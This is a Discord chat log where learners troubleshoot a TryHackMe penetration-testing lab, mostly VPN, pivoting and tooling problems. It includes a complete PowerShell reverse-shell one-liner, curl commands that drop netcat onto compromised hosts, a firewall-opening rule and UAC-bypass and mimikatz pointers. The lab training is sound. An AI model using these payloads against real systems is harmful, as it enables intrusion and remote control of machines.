#wreath-network

Gave +1 Rep to @safe meteor

ok- pretty stoked I was able to 'curl' my way in to the next Task. I have a new found respect for the curl command;) Still curious why the rev shell didn't work but in this game, if one tool wont work, another way will;). We are hackers after all- gimme a piece of gum and a paperclip... MacGyver

I wrote a pseudoshell on that one and used sshuttle and it worked

But the netcat thing looks weird, idk why it wouldn't work for you

I should write a pseudoshell for that...but I'm lazy and it wasn't strictly necessary, though probably a bit stealthier

Can u ping the web server?

check your vpn connection and also make sure the network is running

check network and vpn fine... im having same issues connecting

unable to ping webserver

having an issue with the sshuttle in task 18 and the firewall on the box, any clue how to solve ?

what's the issue?

# Warning: iptables-legacy tables present, use iptables-legacy to see them
iptables v1.8.7 (nf_tables):  CHAIN_ADD failed (No such file or directory): chain OUTPUT
# Warning: iptables-legacy tables present, use iptables-legacy to see them
iptables: Bad rule (does a matching rule exist in that chain?).
fw: fw: error: fw: ['iptables', '-t', 'nat', '-D', 'OUTPUT', '-j', 'sshuttle-12300'] returned 1
iptables: Bad rule (does a matching rule exist in that chain?).
fw: fw: error: fw: ['iptables', '-t', 'nat', '-D', 'PREROUTING', '-j', 'sshuttle-12300'] returned 1
fw: fatal: fw: ['iptables', '-t', 'nat', '-I', 'OUTPUT', '1', '-j', 'sshuttle-12300'] returned 4
c : fatal: cleanup: ['/usr/bin/python3', '/usr/bin/sshuttle', '--method', 'auto', '--firewall'] returned 99````

with what command are you running sshuttle?

sshuttle -r root@10.200.80.200 --ssh-cmd "ssh -i id_rsa" 10.200.80.0/24 -x 10.200.80.200

ohh try to run the command with sudo or as root

tried both

tried using the latest sshuttle from github also

did you need to edit your proxychains.conf for this? I can't recall which step that was required at

no

this was from the start in order to be able to access the hosts behind the webserver

If sshuttle doesn't work you can try another way to make a proxy or just do port forwarding using one of the other techniques

But you can often learn a lot by fixing a hard to fix issue

I completed it without sshuttle, that wasn't the big issue, It was the recommended way, so wanted to try that too. So now I just need to fik that issue

I cant connect to git server using remmina.Did anyone else encoountered the same issue??

I started the lab network but seems the server are not fully starting. :/
I don't get ssh or even web on the prod-serv.

Hi, cannot download vpn profile to access the network, after clicking "Download My Configuration File" I get 404 (Uh-oh, this page has been lost in the matrix.)

Hey guy, I am a subscriber and I cannot see the buttons for starting the network. Also cannot ping the first machine. Any ideas? I am using the Attackbox.

Can you try to regenerate the ovpn file?

Thanks, helped.

Gave +1 Rep to @blazing rock

I have the same problem as matelko1980, but regenerating the ovpn file does not help.

Can you try regenerating it again, and redownloading the ovpn file?

I gave it another try, and waited a few minutes after regeneration before trying fhd download the ovpn file but I still get the same 404 error.

fwiw I had the same problem trying to download a vpn pack for Throwback the other night

same problem here... I had the .ovpn file to connect to wreath network but it gives this error "2021-04-25 01:54:52 TLS Error: TLS handshake failed" so, I tried to regenerate a new .ovpn file, it regenerates but when I want to download a "404 Uh-oh" message appears to me too. 😦

anybody having issues with file upload to Personal-PC (task 40)?

I'm running curl http://my-ip:8081/nc.exe -o c:\\nc-NihilistPenguin.exe but it doesn't show up after I try to ls\dir the directory.

It is getting it from my http server tho:

do you have write permissions on C:\

oh, well that's a shortened example. I ran this for c:\windows\temp\...

(Answer to that is no, btw)

If you're uploading it a directory that you can write to and it isn't working then it's getting picked up by defender

should defender be picking this obfuscated php up? I guess we gotta edit the reverse shell code ourselves so it's different from the example provided in the room?

anyways, network just reset and it works fine now, no clue what the issue was

are you using WSL2?

if so, I think there's some networking voodoo with the host windows machine that prevents sshuttle from working properly

Hey .

I'm trying to a nmap scan on the machine but it's showing me thag the host is down

Is something like adding ip route required?

Which machine?

Hello, I am trying to download the openvpn for wreath and it keeps loading to the Darth Vader - 404 Not Found page. Even after regenerating it I still get the same result.

maybe try using a different vpn region?

DIfferent vpn region for generally connecting to tryhackme? For the wreath network there is only the 'Wreath' option to choose.

ah, my mistake then. Sorry

No worries

#announcements might help, due to the maintence

In Access/Networks, it is written : "You don't have access to any networks". I don't get why so because I have both a paying account and a streak of more than 7. Any ideas?

Did you join the room first?

Yes and the room tells me I have 7 days left of access.

Ok, I just resolved my problem by leaving the room and joining back in ..

look at pins

its not a bug

any help ?

hey whatsup everybody .. i am doing wreath room Task 6 Webserver Exploitation , the exploit work just fine , the problem that i can not pwn a reverse shell to my machine , everything set just fine the port and the ip but i can't get connection i was using port 1337 and did not work so i changed it to 443 in order to work but no luck .. any help please?
thank u .

ok then what ?

i guess i will just wait for someone to answer me

Not every machine has netcat installed

Read the code -- it's near the top. Also, please don't try to ping everyone: it won't work, and makes you look really self-absorbed.

So I'm just starting with the Git Server enumeration, just so that I don't waste my time, what would be a good combo of nmap switches to use on the internal servers? Should I use the good ol -A -p- or would that be super slow?

Certainly wouldn't do -A -p-

Yeah I figured that would prob be mega slow

to start out I guess I'll just run a simple nmap with no switches

see where that takes me

I mean my standard is -p- -v -sV

If you're scanning over a pivot like SSHuttle, maybe not so great. Static nmap will be a bit better

ok then how i am going to have a reverse shell like others did if netcat was not installed already ?..how to change pty to > tty type of shell without a connection ?

Have a look at PayloadsAllTheThings on Github

There are many ways to get a reverse shell -- netcat is not a particularly good one either a lot of the time

I would also highly suggest having a look through https://tryhackme.com/room/introtoshells before carrying on here

ok THANKS a lot

Np 🙂

if needed, netcat binaries are downloadable.

i believe

thanks ..but i am going to try something else than net cat

On the gitstack part I have code execution on the server but it wont execute my powershell command :/

What's the powershell command you are trying, the exact payload

@hidden cradle

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("IP",53);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

You didn't include your IP, you aren't using a port above 10000, and you need to url encode

Well I include the IP when i'm actually doing it but why do I have to use a port above 10,000? And I didn't even think about the URL encoding part, thanks!

Oh wait, I might be mistaken. One of the shells you are supposed to due to port scanning to not throw them off

The initial network scan I did was for the top 15,000 ports.

Oh ok, I might be confused, haven't done a few parts recently.

hm even with URL encoding windows doesnt like my command.

Send the URL

Like the payload

It's just the URL encoded version of what I posted earlier with the right IP and port 12000

I presume you have a proxy setup?

Yes using ssshuttle even tried it using a script to generate an encoded powershell reverse shell but it don't like me

What are you using, Curl or BurpSuite?

neither just re-running the exploit

Sorry about asking these basic questions, I promise I am not trying to be mean.

Yes, I would advise using curl or BurpSuite for the payload

The script can cause issues

ok let me try

I personally used curl however from what I have been told, both work

I can execute basic commands like 'whoami' with the burp method but it still doesn't like my powershell commands. Usually this would work I thought

Gonna try again tomorrow thx for your help though

Try curl -X POST - something to send data "PAYLOAD" url

Firewall?

Yeah that could be it will try netsh advfirewall firewall add rule name="TCP Port 4444" dir=in action=allow protocol=TCP localport=4444 or some variation

Ye, the curl method is curl -X POST -d "PAYLOAD" $ip/web/exploit-username.php

Hello, I have gotten Chisel on the Git Server, proxy all setup, everything connects. i do everything just like the video, and it returns a ERR_EMPTY_RESPONSE

Am i the only one who is having problems in installing empire on kali?😅

nope it's quite exhausting to say the least but apt getting powershell-empire worked fine

I'm feeling a little overwhelmed by all the different types of port forwards and proxy, which should I start out with when playing around with the practical part of the pivoting?

Sshuttle makes things easy.
If you're wanting to get into the nitty-gritty of it, I would suggest messing around with SSH tunneling though. That helps a lot with understanding

Hey, I cannot connect to the first host with SSH... I just downloaded the private key and changed it's permission, but I still getting this error. I've checked the key and there are no spaces on it. I've also waited for the network to restart, but the error still there. Could anyone help me?

I would change the command to this: ssh -i id_rsa root@10.200.93.299 but I am not shure if this helps

@surreal sail I assume you did chmod 600 id_rsa as well to the key?

Sure

Yeah I tried this but nothing changes

I would delete the key, and grab it again if it still doesn't work then box needs to be reset

I did this yesterday, I waited until today for the box to be reseted but still getting the problem =/

I also tried to generate a key and add to authorized_keys on the box, but I don't have permission to write in this file

Is your vpn working fine? no connection errors? Is your kali box updated?

check that there's no copy-paste errors or windows-style newlines

there shouldn't be any newlines at the end either.

Maybe this is not the complete key

Yeah my VPN is fine, I connected to the box with the exploit without problems.

I'm using my Debian, but i'll check for \r\n

Hmm, I did sed -i 's/\r//' id_rsa, no results

I thought this could be the problem, but I really don't know that to do since I cannot upload my own key and the box already has been reseted

Could anyone try to connect to the box with the private key? So that I can know whether the problem is here or there

Maybe the Key was new generated

Oh

I just sent the private key to my machine with /dev/tcp and it worked

Probably I was copying with some badchar

Thank you all for the support 🙂

In the end, the problem was the newline I deleted haha

im having trouble with "
What command would you use to connect back to this server with a SOCKS proxy from a compromised host, assuming your own IP is 172.16.0.200 and backgrounding the process?"

Which task is that

14

I am using kali custom image 2020.4 and cant run empire tried different things like installing pip.

but it seems that both pip2 and pip3 are installed in python3 in my distro

@deft quartz It continues from the first question if that helps at all which is a server and since this is a server/client connection that should tell you what the answer should be.

ight

i got it 🙂

good

[root@prod-serv ~]# curl 10.10.178.77:8080/nmap-y33t3rs0n -o /tmp/nmap-y33t3rs0n && chmod +x /tmp/nmap-y33t3rs0n
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- 0:00:23 --:--:-- 0

should it do this?

hey sorry to bother you, I know you are super busy, any news on that?

I spoke to the last person yesterday (sorry -- took ages to get hold of them). The go-ahead for prizes has been given, but not sure if it's been seen yet 🙂

oh cool!

ty

good job!

oh right wreath writeup...

Can't get starkiller working, just installed empire manually. sudo ./empire --headless & then I visit https://localhost:1337/ accept security warning and then its a blank page

try sudo ./empire --rest

also dont just go there, use starkiller

OH lol I didn't start starkiller whooops

oh yeah if anyone needs a quick command to get their tun0 ip can do ifconfig tun0 | awk '$1 == "inet" {print $2}'

or uh

http://10.10.10.10/

thats how the attackbox gets it iirc

gotcha

i get this error even after installing flask

check if youre using python3 or python2

is this an issue.

no

try python3 -m pip install Flask

tried.Look

when i try to run install.sh for empire.I get this error .Package python-pip is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
However the following packages replace it:
python3-pip

E: Package 'python-m2crypto' has no installation candidate
E: Package 'python-pip' has no installation candidate

idk

Running as root might not be helping

no no you have to

tried everything nothing seems to work

when i try to intsall m2cryto it tells me that requirement is already satisfied

You know what would be nice is if we got 2hrs of time on the wreath network instead of 1hr so I don't have to go back and forth on the time

You can extend it

You don't have limited time on the network

I know buuut

its expensive to run so iirc its better for thm that way :)

Do they run their stuff on AWS or something?

yep

Confused on the Empire part, so for the webserver the .200 it acts as a 'jump server' for my connections to .150 so I make a listener and http_hop listener for .200. Transfer the files to the webserver. Serve them up on the php server thing. THen on the gitserver .200 I use the exploit for gitstack to execute my url encoded powershell stager payload. Except I don't get an agent back. And I did open up the ports on .200 & .150

keep trying, but if it doesnt work and you tried everything you can skip the empire part.

Just completed this room. Learned a lot! Thanks @merry robin 👍

Gave +1 Rep to @merry robin

hi

Hai

Hi guys!

.200 working for you?

I am unable to get the ping back! I have tried to reconnect the VPN but still not working

sudo apt install powershell-empire

install via this, it will satisfy all the requirements

Hi everyone! On task 36 personal PC Exploit Poc I'm able to go to the website IP .100 but when I try to go to the /resources folder it keeps loading without showing me the authentication required....I'm I missing something?

I'm able to ping it

There are many different instances of the wreath network. The third octet of the IP shows which instance you are on. If you can't ping or connect to the network, double-check to make sure the network is running.

Also make sure you're on the Wreath specific VPN

Already tried everything... I'm unable to get to /resources....Network running, website available but not the resources folder...

ok...stupid me...I forget to turn on foxyproxy...

That network provides insane learning points to beginners, props to those that created it, it was a very lucrative room

Aha, this one was my baby.
You are most welcome @thorny arch 🙂

why does it show that i have only one day of access left to the wreath network?

@sweet rune you can only be in the wreath room for 10 days. After that you have to rejoin it, and the network won't be the same as you left it - you'll have to exploit again etc.

thank you

Yeah man, I'm learning so much will all this, this will be extremely useful

I just finish it. I wanted to thank you for all the knowledge that you provide me with this network.

Gave +1 Rep to @merry robin

hie guys i have been failing to access the webserver,when trying to connect via ssh my machine is saying no route to host

+] Stable internet connection
[+] OpenVPN is installed
[+] tun0 exists
[+] tun0 IP is in the correct range
[+] Only one instance of OpenVPN is running
[+] Confirming connectivity
[-] Something went wrong -- please ask for further assistance in the TryHackMe Discord server, subreddit, or forum

First thing that comes to mind is that you might not be on the "Wreath" vpn. It's a separate vpn file that you have to download and execute. Second thing is making sure that the network is up.

i am currently connected but i don't know were am getting it wrong

And the network is running? are you able to ping or nmap the .200 machine?

getting the same error as Guveya now

Network is running, openVPN access shows i'm connected to Wreath Network. unable to ping .200 machine

can't connect either from my linux or attackbox

this might be signal for us to stay away from our computers during the weekend and enjoy air outside 😋

I'm in the same network; cannot reach it either

Ummm i need to close the network

But

There seems no way

Should i leave it be

Its got around 1.25 hrs left on it.

lol

If this is all the same subnet, try to go for a reset. Chances are someone shut a box down manually 🙂

It's working fine for me now, wasn't reset

my vpn file didnt work and cannot regenerate a new one

Are you still joined in the Wreath room?

i just returned to the room today

Remember there's a 10 day limit on it, so you may need to rejoin

I've rejoined it for 5 hours and it still not work, pls help

thanks man it worked!

Gave +1 Rep to @half spoke

Hi guys, i am doing Task 20 Git Server Exploitation. I want to setup the "socat relay from .150 thru .200 to my attacking linux". got difficulties can't see any respons after i send POST request from burp. Need support please

@kind parrot WSL doesn't play nice with networking, so that might have something to do with it. Also check the firewall on 200. If you can netcat from your host to 10.200.84.200:15100 then you know that bit is fine

Hey, quick question

what does this mean?

It means you have 3 days of access left

And then?

wdym

Check the pins :)

Thanks

Have a nice day

yes I did with netcat and its work, only socat relay i had littlebit issue. maybe need more time to figure it out

Hey all.. I was wondering if anyone was able to run mimikatz on git-serv without RDP? I was trying to complete this task with use of only terminal. I tried uploading an Msfvenom and relay my rev shell through socat which went fine but couldn't bypass UAC to run mimikatz, also tried a few powershell privesc techniques but no success

Really just wondering if anyone was able to do this?

I don't think its really possible to run mimkatz through a non-rdp session (I could be wrong). Although you can run most of mimkatz through a meterpreter shell.

I'm thinking you might be right.. I tried the kiwi module aka mimikatz with metasploit but same result because I couldn'y bypass UAC

Did you try invoking incognito?

yeah went through a few option.. getsystem, incognito used some powersploit modules but nothing

currently trying this technique but used a msfvenom dll https://www.bleepingcomputer.com/news/security/bypassing-windows-10-uac-with-mock-folders-and-dll-hijacking/

Wreath Network

I need help In wreath task 5 I am not able to access the website when I am typing the IP address of the machine

/hacking

??

xd

Configuration File cant be downloaded even after Regen ?

probably the firewall, socat works fine on WSL2

did you add the appropriate iptables rules on incoming for the prod-serv?

memory serves it's running a centos, so you should use firewall-cmd

you can probably run it through evil-winrm but it's a bit of a mess

are you using the proper vpn config? it's a separate one for Wreath

yes i did it.

Yup I have downloaded and config the proper vpn and I am also able to ping that server

It may be wanting you to set a host

I've been trying to download the vpn for wreath but its redirecting to error page
I tried to regenerate it too but it's still redirecting to error page

Any idea what to do?

I downloaded yesterday without problems.

but it might be a system glitch right now. I have had a few times with timeout from the site today

anyone free to help me with a chisel forward proxy?

think im missing something here

lol nevermind just read the hint

doh

I tried with Evil-WinRM with no luck... you can run mimikatz but not with admin due to UAC which is what I'm trying to figure out a way to bypass. If I figure it out I'll drop some hints here

let me check my notes

yeah if you have any ideas that be great

ah yeah you need RDP as you need the admin shell

Indeed.. but that said I'm just not the type to give up trying to bind an alternative easily, I feel there must be some method to bybass uac

get a shell as NT Authority/System

thats's the hope... wish me luck lol

finally got it! required multiple socat relays to relay multiple metasploit sessions

Am I allowed to divulge the method I used to run mimikatz without RDP here?

Is there a certificate given for Wreath Network? Or only a badge?

only a badge

Go for it 🙂

Metasploit (or another C2) would be the way to do it

I'll export my cherry tree node to PDF and and put it on github rather than writing another novel in the server and anyone who wants to can check it out there

With your report written and proof-read, you send the PDF to Thomas then sit back and relax, your work is done!

Ok thanks

Gave +1 Rep to @pallid vapor

what a super cool room!

here's a link to the "No RDP" method I used to get mimikatz to work... It is in no way a detailed write-up though https://github.com/UbuntuStrike/Write-ups/blob/master/wreath_mimikatz_no_RDP.pdf

Its only that section btw, not full writeup on the room

cool :)

Someone who can help me with task 40, I am having trouble receiving the revshell, I can upload netcat but I am not getting a reverse shell ..

any errors?

Nop, it just does not give me the connection, I can upload the webshell, netcat without problems, but the revshell does not work

which machine did you upload it to?

In the last machine in the av evasion section

.200? .150?

100

my first guess, from looking at my notes, is that maybe you didn't compile the nc binary correctly

Fixed, in the end it was a problem with the proxy, thanks for trying to help me

Gave +1 Rep to @dry pendant

You're welcome. Glad you got it fixed, sorry I wasn't helpful

What matters is also the intention, so again, thanks xD !!

Can someone help me with this I'm still not able download it

from pinned msg,

You can rejoin at any time though, and your progress in the room isn't reset. You also shouldn't need a streak/sub to rejoin once you've been in there once; but you will need to redownload the VPN connection pack

My 10 days of access ended but I am unable to download new vpn connection from access page. I am getting You don't have access to any networks. Is the streak/sub mandatory now?

hey im on task 30 and i was trying to experiment with the different modules using empire's framework cli. It says that my agent ran the script but i don't know where to actually find the output. The script in the example gave the output directly to me but winPEAS doesn't.

I have finally finished the Wreath room, everything that this room has taught me has been incredible, thank you @merry robin for creating this room it has been an incredible experience!

Gave +1 Rep to @merry robin

So when will the winning reports for Wreath be announced or featured on the site? @merry robin

Very soon 🙂
Winners should already have been contacted. I'm going to announce them at the same time as the YotJF winners

( this might be a stupid question. apologies in advance ) while doing wreath ( Task 17 git server enumeration ) I got a some extra ports open, which doesn't seem to be the case in most writeups and the walk-through by dark. don't really know why?

Nmap scan report for ip-10-200-86-150.eu-west-1.compute.internal (10.200.86.150) Host is up (0.00054s latency). Not shown: 6144 filtered ports PORT STATE SERVICE 80/tcp open http 135/tcp open epmap 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-wbt-server 5985/tcp open wsman MAC Address: 02:4D:36:4B:4F:07 (Unknown)

That's weird, when I did the nmap it didn't report 135

is it because some one was running SMB? that's all I could get from the port numbers.

it's possible someone could have disabled the firewall(?)

so everyone remembers, DO NOT open such low ports, use ports from 15000 onwards, for everyone's sake, also remember to close the smb service when you are no longer using it

15,000

hey @merry robin I submitted a PDF writeup for this, but I was wondering if you would mind me making a kind of 'attack narrative' only one for my own hosting?

just because the network used a lot of techniques I'd like to showcase if i ever put my github pages on my linked in

Aye, of course

cool! thanks

Mb srry xD

Hey!

If you have a Wreath VPN configuration 404 issue upon download could you ping/ DM me.

Hello,
For task 13 (socat) the example to uses netcat (the version with -e). I'm sorry if I missed it but where's the link to download the static binary for that ?
(please ping me 🙂 )

Hi, anyone else having problems with connecting to network? It went to sleep and i booted it back again but now i cannot connect to anything. Am i doing something wrong?

Hej Ma'vio, I have the same issue too. I have tried to regenerate the network config file but to no avail.

https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/ncat?raw=true
That should do it :)

Thank you Muiri

Np! 😄

Hello @cyan vine ,
I have a Wreath VPN configuration 404 issue upon download, could you help me ?

Just passing this onto the site staff :)

thanks 🙂

Gave +1 Rep to @cyan vine

any reason why vpn is not connecting to the vpc

stuck here for a time

umm i am not able to download.. my openvpn file

this is what is being shown

Please no admin pings ❤️

With that, please regenerate it once more

You might have to log out and log back in

sorry

its down

i cant

still

i vedone that

i ve done that too

still

its down

cant download

Then please email support@tryhackme.com

You have to give it a few seconds between clicking the regenerate button and attempting to download it

yea i ve been trying since past 1 hour

and its like.. uk.. making me mad

so

naa

nvm

Please email support, I understand your frustration but the admin pings were entirely unnecessary

m sorry.. didnt mean to.. irritate

thanks for the reply

guys .....

restart your vpn and check network is up

already done 3 times

Yo

Someone fucked up the network

No ping no response or anything at all

Someone fucked it up

I'm from the attack box, which always works... Not this time

theres different instances of the network...

so one person cant mess up the whole thing

try a reset

All instances have the same IP?

no

Cuz I have the same one as the screenshot above

10.200.84.200

I voted to reset the network

join room button showed up again after some time and now I am able to download new config. not sure what was the issue but it got resolved automatically 👍

Hello everybody. Sorry to bother u but I have this little issue with port scanning the last machine of the network

I launch this command: Evil-WinRM PS C:\Users\Administrator\Documents> Invoke-Portscan -Hosts 100.200.87.100 -TopPorts 50

and I get:

Hostname : 100.200.87.100
alive : False
openPorts : {}
closedPorts : {}
filteredPorts : {}
finishTime : 5/8/2021 10:36:56 AM

any idea why?

Evil-WinRM PS C:\Users\Administrator\Documents> arp -a

Interface: 10.200.87.150 --- 0xa
Internet Address Physical Address Type
10.200.87.1 02-76-be-e3-c3-c1 dynamic
10.200.87.100 02-52-59-7f-a0-01 dynamic
10.200.87.200 02-ab-08-16-2c-5b dynamic
10.200.87.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.251 01-00-5e-00-00-fb static
224.0.0.252 01-00-5e-00-00-fc static
255.255.255.255 ff-ff-ff-ff-ff-ff static

Error is here 👉 100.200.87.100

Compare your command with the result of arp -a

Omg u are right!! I promised u I also double checked the code

Maybe I was tired!! Thank you so much

No problem, I was stuck for 20 minutes yesterday because I forgot to start sshuttle again 😄

hi someone know if the wreath lab finish in 6 days? appear me 6 days of access left

later will be paid?

Nope, you own have a certain amount of days in the room, before it expires. Once it expires, all you have to do is rejoin the room, sadly it will clear all your progress.

It won’t clear your progress, check the pins 🙂

By progress, I was meaning your progress on the servers, for instance, pre set binaries, workers, etc.

Oh didn’t think about that

Only because you get put on a different subnet.

wth for 1 hr i was thinking git server machine was a linux system 😆

hello everyone, i have an issue in Task 32

the session is created but i can't connect to the server

i tried with Foxyproxy and Proxychains but none worked

[proxychains] Strict chain ... 127.0.0.1:9050 ... 10.200.88.100:80 <--socket error or timeout!
curl: (7) Couldn't connect to server

I think there is a problem with that host

Evil-WinRM PS C:\Users\Administrator\Documents> Invoke-Portscan -Hosts 10.200.88.100 -TopPorts 50

Hostname : 10.200.88.100
alive : False
openPorts : {}
closedPorts : {}
filteredPorts : {}
finishTime : 5/9/2021 3:00:44 PM

Interface: 10.200.88.150 --- 0xe

10.200.88.1 02-56-a3-18-e9-ef dynamic
10.200.88.100 02-46-02-ae-ed-03 dynamic

Go for a reset. Looks like someone shut it down

@merry robin on your opinion who make the best pentest report from wreath?

I really need to announce the winners. They should all have been notified -- just waiting for the YotJF results too

Just wanna know which want is the best to emulate 🙂

Still need to write mine :(

I'm addicted to socat now, all thanks to muiri 😄

Socat is great

Socat is wonderful

Bow before socat!

Pls i need the vm I'm working on to be reset

currently 7/8 votes

🥺

What octet?

10.200.86.x

It did get reset yesterday.

Lmao 🥵

Hey guys, I'm at task 34 but the download rate is really really slow. It's been almost one hour and I downloaded only 2 folders. Any tips?

So, I finished Wreath recently. And before going after Throwback I'd like to make sure everything is clear in my mind. I made this (ugly) draft of how things go networking wise could anyone tell me that this is correct ?
It's only a draft on MSPaint, I'll make it clean and beautiful with Visio

ughhhhhh

I think you’re kind of over complicating it

I mean if it helps you it helps you but that seems like it would just confuse you more

I mean I develop networks and that confuses me

Did you figure this out? I may have been spraying the admin login page and lock things up. I'm not sure what to do now

I think I figure id out - the ip changed after the initial enumeration

The IP shouldn't change, unless you downloaded a new vpn config.

I'm having issues getting the http_hop to work

running the generated payload doesn't work

i even tried running it directly on the gitserver shell

I get all bunch of errors

mainly RemoteException

• FullyQualifiedErrorId : NativeCommandError

i'm tryna transfer my private key over to the target on task 11
i can connect via ssh, however when i try to scp i get permission denied?

ffs nvm

moving the flag before my file works

Yep

SCP is weird like that

Hey, is there anyway that I can increase the wreath network access time?

leave and rejoin

before the time is over? or after the days left for me in the room?

It says I have 1 day left

but I moved slow due to streaming it on twitch almost daily... And I have 1 day left for AV and further task

You just need to rejoin once your time expires

sure thing 😉 Ohh btw, will it reset my progress? I guess no?

It'll likely be a new network, but your answers won't change

ohh alright... thanks 👍

itll be the equivalent of resetting it basically

Hi in Task 18 Pivoting I use: sshuttle -r root@10.200.86.200 --ssh-cmd "ssh -i sshkey" 10.200.86.0/24 -x 10.200.86.200 and it says connected, but I dont get a connection to 10.200.86.150 over sshuttle. When I ssh into the machine it works

but I dont get a connection to 10.200.86.150 over sshuttle What are you trying to do with 10.200.86.150 ?

Have you tried opening http://10.200.86.150 in a web browser ?

I tried to make service detection with nmap

Well when u used that command above.... you got into the network as prod-serv... If u try to run nmap on ur attacker machine... It is going to be slow... But will allow u to scan .150

Sshuttle will allow u to connect to .200 and access .150 as server for || gitstack|| but does not gives u shell access on .150

For that u need to retrieve password hash of a user residing on gitsever.thm and then connect via either RDP or evil-winrm

@trim sentinel well on 150 machine it is better to use ||evil win-rm|| but even before that you have to find the creds and do some stuff with the firewall

@merry robin thx man for this awesome network really cleared many concepts

Gave +1 Rep to @merry robin

thx got it now

I installed starkiller and empire as it is from the offcial walkthrough but when i ran starkiller I have no listnere types available.

thanks in advance

@open nebula check the empire does it is showing some error code , personally it's better to use pwncat and upload scripts by yourself

pwncat! :))

Hi guys, I have some problems reaching /resources in Task 36 I can reach the page directly with the ip.100 but can't get further. I am using an sshutle to the prod-serv and go with evil-winrm into the git-serv to start the chisel server with socks5 and with the firewall port i opened on the git-serv, my chisel client locally is working fine and connecting to the chisel server on the git-serv. FoxyProxy is active in chrome and firefox set as my chisel listening port to socks5 as mentioned I can reach the Main Page and when navigating to /resources I get the Login prompt after typing in my previously found credentials it seems to be loading but won't connect me to the page, any ideas?

Make sure your proxy in firefox is configured as a socks proxy, not http. That's my first guess without going back and re-reading my notes.

thanks for the fast reply, that's the case in both firefox and chromium, furthermore wouldn't I don't even get the login prompt then? 🤔

I re-read that, that makes not that much sense, let me rephrase it. Shouldn't I then not get the login prompt at all?

Good point. Yeah, without re-reading the room and my notes, I am not sure offhand. Sorry

np thanks for the idea 🙂

you're welcome

https://assets.tryhackme.com/room-badges/74dbe32308d1e9163ab65a2660b0c548.png

Just finished Wreath 🎉 Learned some new stuff for sure. Great stuff 🙂

Maybe anyone else got an idea or maybe ran into the same issue?

Make sure you have the correct creds

Thanks for the reply Muiri, if I understand it correctly it should be the credentials of Task 21 which I tried, using the user found (Txxxxx) and as the password the cracked NTLM Hash of this user. Unfortunately up till now this has not worked for me.

Gave +1 Rep to @merry robin

It should be. Yes.
That's odd -- it's got to be something to do with the proxy, if it isn't loading at all. Check to make sure it's a socks5 proxy on the right port

Well thats the odd thing, the main page loads correctly, and navigating to /resources triggers the login prompt, Chisel server is active trough Evil-winRM set as socks5 with the opened Firewall Port, chisel client locally as socks listening to the opened Port and forwarding it to my local port and my FoxyProxy in FireFox or Chrome is set to Socks5 with the corresponding local port configured in chisel client.

That all sounds correct. Very strange

I think so as well, as I am out of ideas now I will try to access /resources on another client with a bare metal install of kali maybe something in my Main OS blocks my VM from accessing resources. I can't imagine that it does, as everything should be set up to not interfere,
but well I am at my wits end here 😅

Well, that doesn't seem to work as well, tried different chisel versions, different ports as well as a different client with a bare metal install of kali linux still the same problem after the login prompt, it just dies on me while pretending to load /resources, even deleted my firewall rule and added it anew.

Huge respect

🙇

this room is not working for me =/

Muiri

I just finished your room

very nice

uploadvulns

thanks

ok I cant do anything in this room, how can I reset it?

.<

for wreath, you share it with other users, so you have to vote for a reset (at the top of the page). Once there are enough votes, it will be reset to a clean state

MUIR

this is your doing too, omg!

you are gooood ❤️

ok

i f'ed up

i tried to connect with an ssh key with bad permissions and got myself banned

is there anything i can do?

There isn't anything in place to ban you 🙂

muiri

thanks

but... why isnt it working then?

i got the key

ssh -i key root@IP

Permission denied (publickey,gssapi-keyex,gssapi-with-mi

Sounds like a formatting error -- or someone messed with the key

I don't have my Kali active to check

Look, this was my mistake

did the same stupidity with the private key

Well, chmod 600 it

it doesnt lemme in even after that T_T

never heard of pwncat will do some research on it.

@open nebula check this out https://www.youtube.com/watch?v=CISzI9klRkw

sudo ssh.........

Thanks again for the support Muiri, I don't know why and how, but after 2 days banging my head against the wall it just works like a charm. Didn't change a single thing 🤔 😅 kudos and thanks for the great room, really appreciated 👍

Gave +1 Rep to @merry robin

I could not make work the ssh keys for me

=(

@tropic heath do chmod 600 to the keysfirst

Then try

How do I install modules for python2 on my kali vm? I'm trying to run the exploit that was shown in task 19, and I get the following error

Traceback (most recent call last):
  File "exploit-An00bRektn.py", line 17, in <module>
    import requests
ImportError: No module named requests

I'm not sure how to specify the version. The man pages tell me to use pip instead of pip3, but both are defaulting to requests in python3

nvm just saw the pinned messages, I think I can figure it out on my own

Yeah even for me with the bot copied keys it says the same did chmod 600 to all the files

did you copy the public key to your machine? You're supposed to use the private key to connect.

I copy all of them

pub to pub, private to private since the private key gave the same error

After that removed every ssh file from my kali generated them again deleted the copied key called it root_key chmod 600 still "root@10.200.90.200: Permission denied (publickey,gssapi-keyex,gssapi-with-mic)."

@worn zenith you sure you have the root pub key?

Hey guys I'm on Empire section of wreath network, im having some problems in getting a agent in task gitserver! These are my ss

I also tried this with curl but the problem is same!

I think that the problem is in here!

If anyone is able to help me pls see to it!

you're listening on 6000 yet it's pinging back on 7000

doesn't look like it's grabbing the right listener

I think someone patched the webserver...

Yes I got it solved now thanks for help to!

hey, i am getting this error

I dont know what I am doing wrong

If you want to use ip you need — prior if you want to use - you need i

You mixed it up

Try the evilwinrm help for additional info

yeah it's -i not -ip

thank you

But my http-hop listener is on 6000

yeah but something's pinging back on 7000

probably the wrong agent?

What about this error?

there's nothing listening on 7000 on that server

What do u mean??

your php server is listening on 6000

Yes

why is it looking for stuff on 7000?

Where is it saying that that it js looking for 7000?

you may have misconfigured the listener

Ohhk

So I'll have to kill the listeners

check your conf for the hop listener

Ok 👍

Thanks mate for the help

gl

all else fails, nuke everything and try again 🙂

Got it boss!!

One of the best tips generally speaking 😅

Why doesnt id_rsa work when copied with CTRL+C && CTRL+V

md5sum shows different numbers,also

